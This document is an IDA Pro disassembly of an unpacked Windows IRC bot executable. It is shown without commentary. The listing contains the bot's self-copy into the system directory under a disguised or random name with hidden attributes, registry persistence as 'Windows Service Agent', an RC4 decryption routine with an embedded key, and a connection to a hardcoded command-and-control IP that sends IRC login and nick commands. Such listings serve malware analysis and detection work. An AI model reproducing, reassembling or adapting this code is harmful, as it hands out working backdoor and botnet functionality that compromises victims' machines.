;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : CF5D1ADAC7A55F2ED439BFCAA37A49CE
; File Name : u:\work\cf5d1adac7a55f2ed439bfcaa37a49ce_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0003B853 ( 243795.)
; Section size in file : 0003B853 ( 243795.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
; OS type : MS Windows
; Application type: Executable 32bit
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401000(char *Str)
sub_401000 proc near ; CODE XREF: WinMain(x,x,x,x)+358�p
; sub_41912E+1E�p
var_4 = dword ptr -4
Str = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, offset dword_440050
xor esi, esi
mov ebx, offset aWindowsService ; "Windows Service Agent"
loc_401013: ; CODE XREF: sub_401000+69�j
lea eax, [ebp+var_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push dword ptr [edi+4]
push dword ptr [edi]
call dword_4E41D4 ; RegCreateKeyExA
cmp [ebp+Str], esi
jz short loc_40104D
push [ebp+Str] ; Str
call _strlen
pop ecx
push eax
push [ebp+Str]
push 1
push esi
push ebx
push [ebp+var_4]
call dword_4E4244 ; RegSetValueExA
jmp short loc_401057
; ---------------------------------------------------------------------------
loc_40104D: ; CODE XREF: sub_401000+2F�j
push ebx
push [ebp+var_4]
call dword_4E4184 ; RegDeleteValueA
loc_401057: ; CODE XREF: sub_401000+4B�j
push [ebp+var_4]
call dword_4E41FC ; RegCloseKey
add edi, 8
cmp edi, offset dword_440068
jb short loc_401013
pop edi
pop esi
pop ebx
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_401070 proc near ; CODE XREF: sub_4010AB+56�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov edx, [esp+arg_0]
push esi
or esi, 0FFFFFFFFh
test eax, eax
jz short loc_4010A5
push ebx
push edi
lea edi, [eax]
mov ecx, 0FFh
loc_401089: ; CODE XREF: sub_401070+31�j
mov al, [edx]
mov ebx, esi
and eax, ecx
and ebx, ecx
xor eax, ebx
shr esi, 8
mov eax, ds:dword_43D01C[eax*4]
xor esi, eax
inc edx
dec edi
jnz short loc_401089
pop edi
pop ebx
loc_4010A5: ; CODE XREF: sub_401070+E�j
mov eax, esi
pop esi
not eax
retn
sub_401070 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_4010AB(char *Filename)
sub_4010AB proc near ; CODE XREF: sub_416F9A+24A�p
var_10 = dword ptr -10h
Filename = dword ptr 4
push ebx
push esi
xor ebx, ebx
push edi
push ebx ; Mode
call _malloc
mov [esp+10h+var_10], offset dword_440068
push [esp+10h+Filename] ; Filename
mov esi, eax
call _fopen
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz short loc_4010FA
loc_4010D0: ; CODE XREF: sub_4010AB+4D�j
test byte ptr [edi+0Ch], 10h
jnz short loc_4010FE
inc ebx
push ebx ; NewSize
push esi ; Memory
call _realloc
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_4010FA
push edi ; File
push 1 ; Count
lea eax, [esi+ebx-1]
push 1 ; ElementSize
push eax ; DstBuf
call sub_41EFA0
add esp, 10h
jmp short loc_4010D0
; ---------------------------------------------------------------------------
loc_4010FA: ; CODE XREF: sub_4010AB+23�j
; sub_4010AB+39�j
xor eax, eax
jmp short loc_401119
; ---------------------------------------------------------------------------
loc_4010FE: ; CODE XREF: sub_4010AB+29�j
dec ebx
push ebx
push esi
call sub_401070
push esi ; Memory
mov ebx, eax
call _free
push edi ; File
call _fclose
add esp, 10h
mov eax, ebx
loc_401119: ; CODE XREF: sub_4010AB+51�j
pop edi
pop esi
pop ebx
retn
sub_4010AB endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 240h
push ebx
push esi
lea eax, [ebp-34h]
push edi
xor ebx, ebx
push eax
xor edi, edi
mov byte ptr [ebp-34h], 0Ah
mov byte ptr [ebp-33h], 0Eh
mov byte ptr [ebp-32h], 20h
mov byte ptr [ebp-31h], 48h
mov byte ptr [ebp-30h], 0Bh
mov byte ptr [ebp-2Fh], 2Bh
mov byte ptr [ebp-2Eh], 0Ch
mov byte ptr [ebp-2Dh], 23h
mov byte ptr [ebp-2Ch], 3Ah
mov byte ptr [ebp-2Bh], 27h
mov byte ptr [ebp-2Ah], 28h
mov byte ptr [ebp-29h], 5Eh
mov byte ptr [ebp-28h], 2Ah
mov byte ptr [ebp-27h], 1Eh
mov byte ptr [ebp-26h], 2Dh
mov byte ptr [ebp-25h], 5Ah
mov byte ptr [ebp-24h], 1Bh
mov byte ptr [ebp-23h], 0Fh
mov byte ptr [ebp-22h], 4Ch
mov byte ptr [ebp-21h], 44h
mov byte ptr [ebp-20h], 16h
mov byte ptr [ebp-1Fh], 4
mov byte ptr [ebp-1Eh], 57h
mov byte ptr [ebp-1Dh], 23h
mov byte ptr [ebp-1Ch], 11h
mov byte ptr [ebp-1Bh], 53h
mov byte ptr [ebp-1Ah], 38h
mov byte ptr [ebp-19h], 13h
mov byte ptr [ebp-18h], 0Dh
mov byte ptr [ebp-17h], 12h
mov byte ptr [ebp-16h], 25h
mov byte ptr [ebp-15h], 1Ch
mov byte ptr [ebp-14h], 30h
mov byte ptr [ebp-13h], 12h
mov byte ptr [ebp-12h], 50h
mov byte ptr [ebp-11h], 4Fh
mov byte ptr [ebp-10h], 39h
mov byte ptr [ebp-0Fh], 10h
mov byte ptr [ebp-0Eh], 42h
mov byte ptr [ebp-0Dh], 1Fh
mov byte ptr [ebp-0Ch], 37h
mov byte ptr [ebp-0Bh], 1Dh
mov byte ptr [ebp-0Ah], 41h
mov byte ptr [ebp-9], 55h
mov byte ptr [ebp-8], 2Ch
mov byte ptr [ebp-7], 41h
mov byte ptr [ebp-6], 2Ch
mov byte ptr [ebp-5], 58h
mov [ebp-4], bl
call _strlen
mov esi, 101h
mov [ebp-38h], eax
push esi
lea eax, [ebp-13Ch]
push ebx
push eax
call _memset
push esi
lea eax, [ebp-240h]
push ebx
push eax
call _memset
add esp, 1Ch
xor eax, eax
mov ecx, 100h
loc_401227: ; CODE XREF: .text:00401231�j
mov [ebp+eax-13Ch], al
inc eax
cmp eax, ecx
jb short loc_401227
cmp [ebp+14h], ebx
jz short loc_401256
xor eax, eax
loc_40123A: ; CODE XREF: .text:00401252�j
cmp edi, [ebp+14h]
jnz short loc_401241
xor edi, edi
loc_401241: ; CODE XREF: .text:0040123D�j
mov edx, [ebp+10h]
mov dl, [edi+edx]
inc edi
mov [ebp+eax-240h], dl
inc eax
cmp eax, ecx
jb short loc_40123A
jmp short loc_401270
; ---------------------------------------------------------------------------
loc_401256: ; CODE XREF: .text:00401236�j
xor esi, esi
loc_401258: ; CODE XREF: .text:0040126E�j
cmp edi, [ebp-38h]
jnz short loc_40125F
xor edi, edi
loc_40125F: ; CODE XREF: .text:0040125B�j
mov al, [ebp+edi-34h]
inc edi
mov [ebp+esi-240h], al
inc esi
cmp esi, ecx
jb short loc_401258
loc_401270: ; CODE XREF: .text:00401254�j
mov [ebp+14h], ebx
xor edi, edi
mov eax, 0FFh
loc_40127A: ; CODE XREF: .text:004012B4�j
mov dl, [ebp+edi-13Ch]
mov ebx, [ebp+14h]
mov cl, [ebp+edi-240h]
lea esi, [ebp+edi-13Ch]
add ebx, edx
add ecx, ebx
and ecx, eax
inc edi
mov [ebp+14h], ecx
cmp edi, 100h
mov bl, [ebp+ecx-13Ch]
lea ecx, [ebp+ecx-13Ch]
mov [esi], bl
mov [ecx], dl
jb short loc_40127A
xor edi, edi
cmp [ebp+0Ch], edi
mov [ebp+14h], edi
mov [ebp+10h], edi
jbe short loc_401312
loc_4012C3: ; CODE XREF: .text:00401310�j
inc edi
and edi, eax
mov dl, [ebp+edi-13Ch]
lea ecx, [ebp+edi-13Ch]
mov bl, dl
add ebx, [ebp+14h]
and ebx, eax
mov esi, ebx
mov bl, [ebp+esi-13Ch]
mov [ebp+14h], esi
mov [ecx], bl
lea esi, [ebp+esi-13Ch]
mov ebx, [ebp+10h]
mov [esi], dl
mov cl, [ecx]
mov esi, [ebp+8]
add ecx, edx
and ecx, eax
add esi, ebx
mov cl, [ebp+ecx-13Ch]
xor [esi], cl
inc ebx
cmp ebx, [ebp+0Ch]
mov [ebp+10h], ebx
jb short loc_4012C3
loc_401312: ; CODE XREF: .text:004012C1�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401317 proc near ; DATA XREF: WinMain(x,x,x,x)+14�o
var_268 = dword ptr -268h
var_25C = byte ptr -25Ch
var_158 = byte ptr -158h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_28 = dword ptr -28h
var_24 = word ptr -24h
Dst = dword ptr -10h
var_C = dword ptr -0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 25Ch
push ebx
push esi
push edi
push dword_457134
call dword_4E42B8 ; closesocket
call sub_40B957
call dword_4E4178 ; WSACleanup
call dword_4E4178 ; WSACleanup
mov ebx, ds:dword_4F6380
push 64h
call ebx ; Sleep
xor edi, edi
push 10h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
push 44h
lea eax, [ebp+var_54]
pop esi
push esi ; Size
push edi ; Val
push eax ; Dst
call _memset
add esp, 18h
mov [ebp+var_54], esi
mov esi, 104h
lea eax, [ebp+var_25C]
push esi
push eax
mov [ebp+var_48], offset dword_4563A0
mov [ebp+var_28], 1
mov [ebp+var_24], di
call ds:dword_4F637C ; GetSystemDirectoryA
lea eax, [ebp+var_158]
push esi
push eax
push edi
call ds:dword_4F6378 ; GetModuleFileNameA
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+var_54]
push eax
lea eax, [ebp+var_25C]
push eax
push edi
push 28h
push 1
push edi
lea eax, [ebp+var_158]
push edi
push eax
push edi
call ds:dword_4F6374 ; CreateProcessA
test eax, eax
jz short loc_4013DC
push 64h
call ebx ; Sleep
push [ebp+Dst]
mov esi, ds:dword_4F6370
call esi ; CloseHandle
push [ebp+var_C]
call esi ; CloseHandle
loc_4013DC: ; CODE XREF: sub_401317+AF�j
mov eax, [ebp+arg_8]
mov dword ptr [eax+0B0h], offset dword_456398
mov eax, [esp+268h+var_268]
mov large fs:0, eax
add esp, 8
push edi
call ds:dword_4F636C ; ExitProcess
pop edi
pop esi
pop ebx
loc_4013FF: ; DATA XREF: .data:00440004�o
jmp $+5
push 0FFFFh
push 539h
call sub_419589
pop ecx
mov dword_4E3F28, eax
pop ecx
retn
sub_401317 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd)
_WinMain@16 proc near ; CODE XREF: start+121�p
var_988 = byte ptr -988h
var_884 = byte ptr -884h
var_883 = byte ptr -883h
Filename = byte ptr -6F4h
Str = byte ptr -5F4h
Ext = byte ptr -4F0h
SubStr = byte ptr -3F0h
FullPath = byte ptr -2ECh
Dest = byte ptr -1E8h
var_E4 = dword ptr -0E4h
var_D8 = dword ptr -0D8h
var_B8 = dword ptr -0B8h
var_B4 = word ptr -0B4h
Source = byte ptr -0A0h
Dst = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
hInstance = dword ptr 8
hPrevInstance = dword ptr 0Ch
lpCmdLine = dword ptr 10h
nShowCmd = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 988h
push ebx
xor ebx, ebx
push esi
push edi
mov [ebp+var_8], ebx
mov [ebp+var_C], ebx
mov [ebp+var_4], offset sub_401317
push [ebp+var_4]
push large dword ptr fs:0
mov large fs:0, esp
mov esi, ds:dword_4F63B0
call esi ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov dword_4E3F2C, eax
call esi ; GetTickCount
push eax ; Seed
call _srand
pop ecx
call sub_409E0C
push 2
call dword_4E42CC ; SetErrorMode
push 7530h
push offset aK3y ; "k3y"
push ebx
push ebx
call ds:dword_4F63AC ; CreateMutexA
push eax
call ds:dword_4F63A8 ; WaitForSingleObject
cmp eax, 102h
jnz short loc_40149B
push 1
call ds:dword_4F636C ; ExitProcess
loc_40149B: ; CODE XREF: WinMain(x,x,x,x)+76�j
lea eax, [ebp+var_884]
push eax
push 202h
call dword_4E4190 ; WSAStartup
cmp eax, ebx
jnz loc_4019DE
cmp [ebp+var_884], 2
jnz loc_4019D8
xor eax, eax
mov al, [ebp+var_883]
cmp al, 2
jnz loc_4019D8
mov esi, 104h
lea eax, [ebp+SubStr]
push esi
push eax
call ds:dword_4F637C ; GetSystemDirectoryA
lea eax, [ebp+FullPath]
push esi
push eax
push ebx
call ds:dword_4F63A4 ; GetModuleHandleA
push eax
call ds:dword_4F6378 ; GetModuleFileNameA
lea eax, [ebp+Ext]
push eax ; Ext
lea eax, [ebp+Filename]
push eax ; Filename
push ebx ; Dir
lea eax, [ebp+FullPath]
push ebx ; Drive
push eax ; FullPath
call __splitpath
add esp, 14h
lea eax, [ebp+Ext]
push eax
lea eax, [ebp+Filename]
push eax
push offset aSS ; "%s%s"
lea eax, [ebp+Str]
push esi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+SubStr]
push eax ; SubStr
lea eax, [ebp+FullPath]
push eax ; Str
call _strstr
add esp, 1Ch
test eax, eax
jnz loc_401710
cmp dword_4E4098, ebx
mov esi, offset Str ; "wgl23.exe"
jz short loc_401596
push esi ; Str
xor edi, edi
call _strlen
sub eax, 4
pop ecx
jz short loc_401596
loc_401573: ; CODE XREF: WinMain(x,x,x,x)+179�j
call _rand
push 1Ah
cdq
pop ecx
idiv ecx
push esi ; Str
add dl, 61h
mov byte ptr Str[edi], dl ; "wgl23.exe"
inc edi
call _strlen
sub eax, 4
pop ecx
cmp edi, eax
jb short loc_401573
loc_401596: ; CODE XREF: WinMain(x,x,x,x)+148�j
; WinMain(x,x,x,x)+156�j
lea eax, [ebp+SubStr]
push esi
push eax
lea eax, [ebp+Dest]
push offset Format ; "%s\\%s"
push eax ; Dest
call _sprintf
add esp, 10h
lea eax, [ebp+Dest]
push eax
call ds:dword_4F63A0 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_4015D6
lea eax, [ebp+Dest]
push 80h
push eax
call ds:dword_4F639C ; SetFileAttributesA
loc_4015D6: ; CODE XREF: WinMain(x,x,x,x)+1A7�j
mov esi, ds:dword_4F6398
lea eax, [ebp+Dest]
push ebx
push eax
lea eax, [ebp+FullPath]
xor edi, edi
push eax
loc_4015ED: ; CODE XREF: WinMain(x,x,x,x)+209�j
call esi ; CopyFileA
test eax, eax
jnz short loc_401626
call ds:dword_4F6394 ; RtlGetLastWin32Error
cmp edi, ebx
jnz short loc_401626
cmp eax, 20h
jz short loc_401607
cmp eax, 5
jnz short loc_401626
loc_401607: ; CODE XREF: WinMain(x,x,x,x)+1E5�j
push 1
pop edi
push 3A98h
call ds:dword_4F6380 ; Sleep
lea eax, [ebp+Dest]
push ebx
push eax
lea eax, [ebp+FullPath]
push eax
jmp short loc_4015ED
; ---------------------------------------------------------------------------
loc_401626: ; CODE XREF: WinMain(x,x,x,x)+1D6�j
; WinMain(x,x,x,x)+1E0�j ...
lea eax, [ebp+Dest]
push eax
call sub_418FE7
pop ecx
lea eax, [ebp+Dest]
push 7
push eax
call ds:dword_4F639C ; SetFileAttributesA
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
push 44h
lea eax, [ebp+var_E4]
pop esi
push esi ; Size
push ebx ; Val
push eax ; Dst
call _memset
add esp, 18h
mov [ebp+var_E4], esi
mov [ebp+var_D8], offset dword_4E40BC
mov [ebp+var_B4], bx
push 1
pop esi
mov [ebp+var_B8], esi
call ds:dword_4F6390 ; GetCurrentProcessId
push eax
push esi
push 100000h
call ds:dword_4F638C ; OpenProcess
lea ecx, [ebp+FullPath]
push ecx
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_988]
push offset aSDS ; "%s %d \"%s\""
push eax ; Dest
call _sprintf
add esp, 14h
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+var_E4]
push eax
lea eax, [ebp+SubStr]
push eax
push ebx
push 28h
push esi
push ebx
lea eax, [ebp+var_988]
push ebx
push eax
lea eax, [ebp+Dest]
push eax
call ds:dword_4F6374 ; CreateProcessA
test eax, eax
jz short loc_401710
push 0C8h
call ds:dword_4F6380 ; Sleep
push [ebp+Dst]
mov esi, ds:dword_4F6370
call esi ; CloseHandle
push [ebp+var_1C]
call esi ; CloseHandle
call dword_4E4178 ; WSACleanup
push ebx
call ds:dword_4F636C ; ExitProcess
loc_401710: ; CODE XREF: WinMain(x,x,x,x)+137�j
; WinMain(x,x,x,x)+2CB�j
cmp dword_4F4788, 2
jle short loc_40175C
mov eax, dword_4F478C
push dword ptr [eax+4] ; Str
call _atoi
pop ecx
mov esi, eax
push 0FFFFFFFFh
push esi
call ds:dword_4F63A8 ; WaitForSingleObject
push esi
call ds:dword_4F6370 ; CloseHandle
mov eax, dword_4F478C
cmp [eax+8], ebx
jz short loc_40175C
push 7D0h
call ds:dword_4F6380 ; Sleep
mov eax, dword_4F478C
push dword ptr [eax+8]
call ds:dword_4F6388 ; DeleteFileA
loc_40175C: ; CODE XREF: WinMain(x,x,x,x)+2FC�j
; WinMain(x,x,x,x)+326�j
cmp dword_44008C, ebx
jz short loc_401779
cmp dword_4E42F0, ebx
jnz short loc_401779
lea eax, [ebp+Str]
push eax ; Str
call sub_401000
pop ecx
loc_401779: ; CODE XREF: WinMain(x,x,x,x)+347�j
; WinMain(x,x,x,x)+34F�j
lea eax, [ebp+Source]
push offset asc_440A60 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push ebx ; int
push eax ; Source
call sub_40B78E
lea eax, [ebp+Source]
push eax
call sub_415C77
push 0B80h ; Size
push ebx ; Val
push offset dword_4563A8 ; Dst
call _memset
add esp, 24h
lea eax, [ebp+Source]
push offset asc_440A7C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 1 ; int
push eax ; Source
call sub_40B78E
add esp, 14h
mov esi, eax
mov edi, ds:dword_4F6384
lea eax, [ebp+var_8]
push eax
push ebx
push ebx
push offset sub_41A919
push ebx
push ebx
call edi ; CreateThread
imul esi, 234h
cmp eax, ebx
mov dword_45713C[esi], eax
jnz short loc_40181C
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_440AA0 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40181C: ; CODE XREF: WinMain(x,x,x,x)+3E4�j
lea eax, [ebp+Source]
push eax
call sub_415C77
push 2
call sub_40B9D6
pop ecx
test eax, eax
pop ecx
jnz short loc_4018A1
lea eax, [ebp+Source]
push offset asc_440AE0 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 2 ; int
push eax ; Source
call sub_40B78E
add esp, 14h
mov esi, eax
lea eax, [ebp+var_8]
push eax
push ebx
push esi
push offset sub_410CB5
push ebx
push ebx
call edi ; CreateThread
imul esi, 234h
cmp eax, ebx
mov dword_45713C[esi], eax
jnz short loc_401894
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_440B0C ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_401894: ; CODE XREF: WinMain(x,x,x,x)+45C�j
lea eax, [ebp+Source]
push eax
call sub_415C77
pop ecx
loc_4018A1: ; CODE XREF: WinMain(x,x,x,x)+418�j
call _rand
push 7Fh ; Count
and eax, 3
push offset Source ; "69.14.32.48"
push offset Dest ; Dest
mov dword_4E40B4, eax
call _strncpy
mov eax, dword_44006C
push 3Fh ; Count
mov edi, offset byte_4E3FB4
push offset aPiavnc ; "##piavnc##"
push edi ; Dest
mov dword_4E4084, eax
call _strncpy
push 3Fh ; Count
mov esi, offset byte_4E3FF4
push offset byte_4E40A0 ; Source
push esi ; Dest
call _strncpy
add esp, 24h
mov dword_4E4088, ebx
loc_4018F6: ; CODE XREF: WinMain(x,x,x,x)+563�j
; WinMain(x,x,x,x)+56E�j ...
mov [ebp+var_4], ebx
loc_4018F9: ; CODE XREF: WinMain(x,x,x,x)+517�j
push offset dword_4E3F30
mov dword_4E40B0, ebx
call sub_4019E7
cmp eax, 2
mov [ebp+var_10], eax
jz loc_4019D3
cmp dword_4E40B0, ebx
jz short loc_401920
dec [ebp+var_4]
loc_401920: ; CODE XREF: WinMain(x,x,x,x)+500�j
push 0BB8h
call ds:dword_4F6380 ; Sleep
inc [ebp+var_4]
cmp [ebp+var_4], 6
jl short loc_4018F9
cmp [ebp+var_10], 2
jz loc_4019D3
cmp [ebp+var_C], ebx
jz short loc_401983
push 7Fh ; Count
push offset Source ; "69.14.32.48"
push offset Dest ; Dest
call _strncpy
mov eax, dword_44006C
push 3Fh ; Count
push offset aPiavnc ; "##piavnc##"
push edi ; Dest
mov dword_4E4084, eax
call _strncpy
push 3Fh ; Count
push offset byte_4E40A0 ; Source
push esi ; Dest
call _strncpy
add esp, 24h
mov [ebp+var_C], ebx
jmp loc_4018F6
; ---------------------------------------------------------------------------
loc_401983: ; CODE XREF: WinMain(x,x,x,x)+526�j
cmp byte_4E40A4, bl
jz loc_4018F6
push 7Fh ; Count
push offset byte_4E40A4 ; Source
push offset Dest ; Dest
call _strncpy
mov eax, dword_440070
push 3Fh ; Count
push offset byte_4E40A8 ; Source
push edi ; Dest
mov dword_4E4084, eax
call _strncpy
push 3Fh ; Count
push offset byte_4E40AC ; Source
push esi ; Dest
call _strncpy
add esp, 24h
mov [ebp+var_C], 1
jmp loc_4018F6
; ---------------------------------------------------------------------------
loc_4019D3: ; CODE XREF: WinMain(x,x,x,x)+4F4�j
; WinMain(x,x,x,x)+51D�j
call sub_40B957
loc_4019D8: ; CODE XREF: WinMain(x,x,x,x)+A1�j
; WinMain(x,x,x,x)+B1�j
call dword_4E4178 ; WSACleanup
loc_4019DE: ; CODE XREF: WinMain(x,x,x,x)+94�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
_WinMain@16 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4019E7 proc near ; CODE XREF: WinMain(x,x,x,x)+4E9�p
; DATA XREF: sub_401CC7+677C�o
var_190 = dword ptr -190h
Args = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_CC = byte ptr -0CCh
var_8C = byte ptr -8Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
Dest = byte ptr -2Ch
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
mov eax, [ebp+arg_0]
push esi
push edi
push 59h
pop ecx
mov esi, eax
lea edi, [ebp+var_190]
rep movsd
mov dword ptr [eax+160h], 1
loc_401A0C: ; CODE XREF: sub_4019E7+E6�j
; sub_4019E7+136�j ...
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_3C]
call dword_4E4220 ; htons
mov [ebp+var_E], ax
lea eax, [ebp+Args]
push eax
call sub_40AE8D
test eax, eax
pop ecx
mov [ebp+var_C], eax
jz loc_401B39
push 1Ch ; Size
lea eax, [ebp+Dest]
push 0 ; Val
push eax ; Dst
call _memset
push 0 ; Str1
lea eax, [ebp+Dest]
push dword_44009C ; int
push dword_440098 ; int
push eax ; Dest
call sub_40B487
mov edi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 1Bh ; Count
add eax, offset byte_457140
push edi ; Source
push eax ; Dest
call _strncpy
add esp, 28h
push 6
push 1
push 2
call dword_4E42A0 ; socket
mov esi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 10h
mov dword_457134[eax], esi
lea eax, [ebp+Dst]
push eax
push esi
call dword_4E41C8 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_401AD2
push esi
call dword_4E42B8 ; closesocket
call sub_40AEB6
push 7D0h
loc_401AC7: ; CODE XREF: sub_4019E7+146�j
call ds:dword_4F6380 ; Sleep
jmp loc_401A0C
; ---------------------------------------------------------------------------
loc_401AD2: ; CODE XREF: sub_4019E7+CD�j
lea eax, [ebp+Args]
push eax ; Args
push offset asc_440B40 ; "-"
call sub_415CEB
push [ebp+var_38]
lea eax, [ebp+Args]
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_CC]
push [ebp+var_190]
push edi
push eax
lea eax, [ebp+var_10C]
push eax
push esi
call sub_401B4F
add esp, 28h
mov edi, eax
push esi
call dword_4E42B8 ; closesocket
test edi, edi
jz loc_401A0C
cmp edi, 1
jnz short loc_401B2F
push 0DBBA0h
jmp short loc_401AC7
; ---------------------------------------------------------------------------
loc_401B2F: ; CODE XREF: sub_4019E7+13F�j
cmp edi, 2
jz short loc_401B3D
jmp loc_401A0C
; ---------------------------------------------------------------------------
loc_401B39: ; CODE XREF: sub_4019E7+5A�j
xor eax, eax
jmp short loc_401B49
; ---------------------------------------------------------------------------
loc_401B3D: ; CODE XREF: sub_4019E7+14B�j
push [ebp+var_34]
call sub_40BAAA
pop ecx
push 2
pop eax
loc_401B49: ; CODE XREF: sub_4019E7+154�j
pop edi
pop esi
leave
retn 4
sub_4019E7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B4F proc near ; CODE XREF: sub_4019E7+123�p
Dst = byte ptr -1A90h
var_A90 = dword ptr -0A90h
var_2C0 = dword ptr -2C0h
var_140 = dword ptr -140h
Str = byte ptr -0A0h
Dest = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Source = dword ptr 14h
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, 1A90h
call __alloca_probe
push ebx
push esi
push edi
xor ebx, ebx
push 3
mov [ebp+var_8], ebx
lea eax, [ebp+var_2C0]
pop ecx
loc_401B6D: ; CODE XREF: sub_401B4F+26�j
mov [eax], bl
add eax, 80h
dec ecx
jnz short loc_401B6D
cmp byte_4E409C, bl
jz short loc_401B94
push offset byte_4E409C ; Args
push offset aPassS ; "PASS %s\r\n"
push [ebp+arg_0] ; int
call sub_409D26
add esp, 0Ch
loc_401B94: ; CODE XREF: sub_401B4F+2E�j
push [ebp+Source]
lea eax, [ebp+Dest]
push ebx ; Str1
push ebx ; int
push 2 ; int
push eax ; Dest
call sub_40B487
add esp, 10h
push eax
lea eax, [ebp+Str]
push [ebp+Source]
push offset aNickSUserS00S ; "NICK %s\r\nUSER %s 0 0 :%s\r\n"
push eax ; Dest
call _sprintf
add esp, 14h
lea eax, [ebp+Str]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push [ebp+arg_0]
call dword_4E4270 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_401BFE
push [ebp+arg_0]
call dword_4E42B8 ; closesocket
push 1388h
call ds:dword_4F6380 ; Sleep
loc_401BF7: ; CODE XREF: sub_401B4F+D9�j
; sub_401B4F+153�j
xor eax, eax
loc_401BF9: ; CODE XREF: sub_401B4F+173�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_401BFE: ; CODE XREF: sub_401B4F+92�j
; sub_401B4F+F8�j ...
mov esi, 1000h
lea eax, [ebp+Dst]
push esi ; Size
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
push ebx
push esi
push eax
push [ebp+arg_0]
call dword_4E4238 ; recv
test eax, eax
jle short loc_401BF7
lea eax, [ebp+var_A90]
push eax ; int
lea eax, [ebp+Dst]
push eax ; Str
call sub_418CD0
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_C], eax
mov [ebp+var_4], ebx
jle short loc_401BFE
lea edi, [ebp+var_A90]
loc_401C4F: ; CODE XREF: sub_401B4F+165�j
push 1
pop esi
loc_401C52: ; CODE XREF: sub_401B4F+144�j
push [ebp+arg_1C] ; int
lea eax, [ebp+var_8]
push esi ; File
push eax ; int
lea eax, [ebp+var_140]
push eax ; int
lea eax, [ebp+var_2C0]
push eax ; int
push [ebp+arg_18] ; int
push [ebp+Source] ; Source
push [ebp+arg_8] ; int
push [ebp+arg_4] ; int
push [ebp+arg_0] ; int
push dword ptr [edi] ; Src
call sub_401CC7
add esp, 2Ch
dec eax
